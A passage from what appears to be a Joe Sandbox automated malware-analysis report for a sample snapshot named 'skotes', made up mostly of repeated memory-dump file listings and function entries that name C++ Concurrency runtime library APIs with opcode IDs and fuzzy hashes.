                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: eventObject
                                                                                                                                              • API String ID: 1288476792-1680012138
                                                                                                                                              • Opcode ID: 440c2a349dd4317868f128153035325bcaa8a5a7278390f68b501d5823e75cd8
                                                                                                                                              • Instruction ID: 01ca253de89ce3b15d393a0651f53f227556b71ac39d3dfb13db4180427383f7
                                                                                                                                              • Opcode Fuzzy Hash: 440c2a349dd4317868f128153035325bcaa8a5a7278390f68b501d5823e75cd8
                                                                                                                                              • Instruction Fuzzy Hash: F7112975640214EBDB14EBA5EC82FEF73685F00309F71415BF505B61C1EB38AA04C66D
                                                                                                                                              Function 0042A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
                                                                                                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pScheduler
                                                                                                                                              • API String ID: 246774199-923244539
                                                                                                                                              • Opcode ID: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
                                                                                                                                              • Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
                                                                                                                                              • Opcode Fuzzy Hash: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
                                                                                                                                              • Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E
                                                                                                                                              Function 0043504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                              • Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                                                                                                                                              • Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
                                                                                                                                              • Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                                                                                                                                              • Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99
                                                                                                                                              Function 00434C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EqualOffsetTypeids
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1707706676-0
                                                                                                                                              • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                              • Instruction ID: cef6b095d55e150eee694991f596d606281b118854b35fc2e5d75d5fbf24ef20
                                                                                                                                              • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                              • Instruction Fuzzy Hash: C851BC35A042099FDF10CFA8C4806EEBBF4EF89354F14649BE850A7361D33ABA05CB54
                                                                                                                                              Function 0042DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64
                                                                                                                                                • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                                                                                                                                              • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
                                                                                                                                              • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 0042DC56
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
